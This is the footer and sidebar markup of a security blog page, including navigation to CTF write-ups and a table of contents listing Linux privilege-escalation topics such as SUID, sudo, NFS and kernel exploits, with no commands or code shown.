<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/05/24/kenobi/">← Next [THM]  kenobi</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/05/24/LampSecurity-CTF6_my/">[vulnhub]  LampSec-CTF6 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">Dr.T3yT3y</a></h1><div id="description"><p>May the flame guide thee</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">1.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux-Priv-Esca"><span class="toc-number">1.1.</span> <span class="toc-text">Linux Priv Esca</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%8B%E5%8A%A8%E6%9E%9A%E4%B8%BE"><span class="toc-number">1.1.1.</span> <span class="toc-text">手动枚举</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E6%9E%9A%E4%B8%BE"><span class="toc-number">1.1.2.</span> <span class="toc-text">自动枚举</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Trick"><span class="toc-number">1.1.3.</span> <span class="toc-text">Trick</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#shell%E7%9A%84%E7%A8%B3%E5%AE%9A"><span class="toc-number">1.1.3.1.</span> <span class="toc-text">shell的稳定</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">1.1.4.</span> <span class="toc-text">常用方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#bash-version"><span class="toc-number">1.1.4.1.</span> <span class="toc-text">bash version</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#MySQL-udf"><span class="toc-number">1.1.4.2.</span> <span class="toc-text">MySQL udf</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%9D%A1%E4%BB%B6"><span class="toc-number">1.1.4.2.1.</span> <span class="toc-text">提权条件</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">1.1.4.2.2.</span> <span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#x2F-etc-x2F-shadow"><span class="toc-number">1.1.4.3.</span> <span class="toc-text">&#x2F;etc&#x2F;shadow</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#x2F-etc-x2F-passwd"><span class="toc-number">1.1.4.4.</span> <span class="toc-text">&#x2F;etc&#x2F;passwd</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sudo-%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.5.</span> <span class="toc-text">sudo 环境变量提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E4%BB%BB%E5%8A%A1"><span class="toc-number">1.1.4.6.</span> <span class="toc-text">自动任务</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SUID"><span class="toc-number">1.1.4.7.</span> <span class="toc-text">SUID</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6"><span class="toc-number">1.1.4.7.1.</span> <span class="toc-text">可执行文件</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%85%B1%E4%BA%AB%E5%BA%93%E6%B3%A8%E5%85%A5%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.7.2.</span> <span class="toc-text">共享库注入提权</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E5%88%A9%E7%94%A8"><span class="toc-number">1.1.4.7.3.</span> <span class="toc-text">环境变量利用</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SUID-shell-%E5%8A%9F%E8%83%BD%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.7.4.</span> <span class="toc-text">SUID-shell 功能提权</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AF%86%E7%A0%81%E5%92%8C%E5%AF%86%E9%92%A5%E5%8E%86%E5%8F%B2"><span class="toc-number">1.1.4.8.</span> <span class="toc-text">密码和密钥历史</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#NFS%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.9.</span> <span class="toc-text">NFS提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.10.</span> <span class="toc-text">内核提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#doas-less-vi%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.11.</span> <span class="toc-text">doas less + vi提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8MOTD%E6%9C%BA%E5%88%B6%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.12.</span> <span class="toc-text">利用MOTD机制提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%AF%E9%A2%84%E6%B5%8BPRNG%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3SSH%E6%8F%90%E6%9D%83"><span class="toc-number">1.1.4.13.</span> <span class="toc-text">可预测PRNG暴力破解SSH提权</span></a></li></ol></li></ol></li></ol></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>